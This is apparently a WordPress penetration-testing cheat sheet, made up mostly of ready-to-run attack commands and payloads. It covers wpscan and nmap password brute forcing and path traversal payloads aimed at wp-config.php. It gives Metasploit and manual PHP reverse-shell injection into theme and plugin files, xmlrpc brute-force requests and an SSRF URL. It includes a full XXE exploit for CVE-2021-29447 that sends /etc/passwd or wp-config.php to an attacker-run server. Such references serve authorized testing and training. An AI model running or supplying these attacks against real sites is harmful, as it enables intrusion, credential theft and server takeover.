# WordPress Pentesting

WordPress is a content management system.

### Enumeration <a href="#enumeration" id="enumeration"></a>

```
nmap --script http-wordpress-brute -p 80 <target-ip>
nmap --script http-wordpress-enum --script-args type="plugins",search-limit=1500 -p 80 <target-ip>
nmap --script http-wordpress-users -p 80 <target-ip>
nmap --script http-wordpress-* -p 80 <target-ip>
```

#### WpScan <a href="#wpscan" id="wpscan"></a>

[**Wpscan**](https://github.com/wpscanteam/wpscan) is a WordPress security scanner which can brute force credentials.

```
wpscan --url https://example.com -P wordlist.txt

# Ignore TLS check (--disable-tls-checks)
wpscan --url https://example.com -P wordlist.txt --disable-tls-checks

# --rua: random user agent
# --http-auth username:password
# -e: enumerate
#  ap: All plugins
#  at: All themes
#  tt: Timthumbs
#  cb: Config backups
#  dbe: Db exports
#  u: User IDs range
#  m: Media IDs range
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url https://example.com -P /usr/share/wordlists/rockyou.txt

# Specifify username (-U)
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url https://example.com -U username -P /usr/share/wordlists/rockyou.txt
```

### Version Detection <a href="#version-detection" id="version-detection"></a>

There is the meta tag for WordPress in the head tag of the HTML source code.

```
<meta name="generator" content="WordPress x.x.x" />
```

### Interesting Directories/Files <a href="#interesting-directoriesfiles" id="interesting-directoriesfiles"></a>

```
/author/admin/
/index.php/author/admin/
/license.txt
/readme.html
/robots.txt

/wp-admin/
/wp-admin/admin-ajax.php
/wp-admin/upload.php
/wp-config.php
/wp-content/
/wp-content/uploads/
/wp-includes/
/wp-json/wp/v1/
/wp-json/wp/v1/users
/wp-json/wp/v2/
/wp-json/wp/v2/users
/wp-login.php

# Users
/?author=1
/?author=2

# Posts
/?p=1
/?p=2

# Private/Draft Posts (WordPress <= 5.2.3) 
/?static=1
```

### Try to Login with Default Credential <a href="#try-to-login-with-default-credential" id="try-to-login-with-default-credential"></a>

Access to **`/wp-login.php`** and use the default credential in the login form.

```
admin:password
```

### Path Traversal <a href="#path-traversal" id="path-traversal"></a>

Check if the WordPress version or the plugin is vulnerable to path traversal. For example:

```
/wp-content/plugins/<plugin_name>/<plugin_name>.php?someParam=../../../../wp-config.php
/wp-content/plugins/<plugin_name>/<plugin_name>.php?someParam=php://filter/resource=../../../../wp-config.php
/wp-content/plugins/<plugin_name>/php/<plugin_name>.php?someParam=../../../../wp-config.php
/wp-content/plugins/<plugin_name>/php/<plugin_name>.php?someParam=php://filter/resource=../../../../wp-config.php
```

### Reverse Shell <a href="#reverse-shell" id="reverse-shell"></a>

To achieve reverse shell, we need the admin credential.

#### Metasploit <a href="#metasploit" id="metasploit"></a>

```
msfconsole
msf> use exploit/unix/webapp/wp_admin_shell_upload
msf> set RHOSTS <target-ip>
msf> set LHOST <local-ip>
msf> set USERNAME admin
msf> set PASSWORD admin
msf> check
msf> run
meterpreter> shell
```

#### PHP Reverse Shell Injection <a href="#php-reverse-shell-injection" id="php-reverse-shell-injection"></a>

* **Themes**
  1. Access to dashboard (**/wp-admin/**).
  2. Move to **"Appearance"** and select theme e.g. "Twenty Seventeen".
  3. Click **"Theme Editor"** or **"Editor"** in the **"Appearance"** section.
  4. In the theme editor, click **"404 Template (404.php)"** on the right.
  5. Copy and paste the script for Reverse Shell [here](https://github.com/pentestmonkey/php-reverse-shell). For Windows, [this payload](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php) is available.
  6. Edit **"$ip"** and **"$port"** to assign local machine ip and port in the script.
  7. In your terminal, start netcat listener for getting the incoming connection from the website.

     ```
     nc -lvnp <local-port>
     ```
  8. Access "<https://vulnerable.com/wp-content/themes/twentyseventeen/404.php>". We should get the target shell in the netcat listener.
* **Plugins**
  1. Go to Plugins → Plugin Editor
  2. Insert the PHP reverse shell code into the file (e.g. plugin\_name.php) and update $ip and $port.
  3. Start netcat listener “nc -lvnp 4444” in terminal.
  4. Then access to <https://example.com/wp-content/plugins/\\\\/\\\\.php>
  5. We should get a shell.

### XML-RPC (xmlrpc.php) <a href="#xml-rpc-xmlrpcphp" id="xml-rpc-xmlrpcphp"></a>

* **Get All Methods**

  ```
  POST /xmlrpc.php HTTP/1.1
  Host: vulnerable.com
  ...

  <?xml version="1.0" encoding="utf-8"?> 
  <methodCall> 
  <methodName>system.listMethods</methodName> 
  <params></params> 
  </methodCall>
  ```
* **Ping Back**

  Use [**PostBin**](https://www.toptal.com/developers/postbin/) to confirm the results.

  ```
  POST /xmlrpc.php HTTP/1.1
  Host: vulnerable.com
  ...

  <?xml version="1.0" encoding="utf-8"?>
  <methodCall>
  <methodName>pingback.ping</methodName>
  <params>
  <param><value><string>https://www.toptal.com/developers/postbin/xxxxxxxxxxxxx-xxxxxxxxxxxxx</string></value></param>
  <param><value><string>http://vulnerable.com</string></value></param>
  </params>
  </methodCall>
  ```
* **User Enumeration**

  It’s recommended to use Burp Intruder or Turbo Intruder for brute forcing username/password.

  ```
  POST /xmlrpc.php HTTP/1.1
  Host: vulnerable.com
  ...

  <?xml version="1.0" encoding="utf-8"?> 
  <methodCall> 
  <methodName>wp.getUsersBlogs</methodName> 
  <params>
  <param><value>{username}</value></param>
  <param><value>{password}</value></param>
  </params> 
  </methodCall>
  ```

### XXE (CVE-2021-29447) <a href="#xxe-cve-2021-29447" id="xxe-cve-2021-29447"></a>

If you have a normal user credential, upload the exploitable media (.WAV) with XXE and reveal sensitive information.\
First off, create **"exploit.wav"**.

```
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<local-ip>:9001/exploit.dtd'"'"'>%remote;%init;%trick;] >\x00'> exploit.wav
```

Next create **"exploit.dtd"**.

```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!-- <!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../wp-config.php"> -->
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://<local-ip>:9001/?p=%file;'>">
```

Then start PHP server in local machine.

```
php -S 0.0.0.0:9001
```

In target website, login as normal user and go to **"Media"**, click **"Add New"**.\
Upload the **"exploit.wav"**.\
After that, open the WAV file. You should see the information is revealed in your console.

#### Decode Base64 <a href="#decode-base64" id="decode-base64"></a>

To decode the Base64, create **“decode.php”** as following.

```
<?php echo zlib_decode(base64_decode('<Base64_Here>')); ?>
```

Execute the script to decode it.

```
php decode.php
```

### SSRF <a href="#ssrf" id="ssrf"></a>

#### oEmbed Proxy <a href="#oembed-proxy" id="oembed-proxy"></a>

```
/wp-json/oembed/1.0/proxy?url=http://10.0.0.1/
```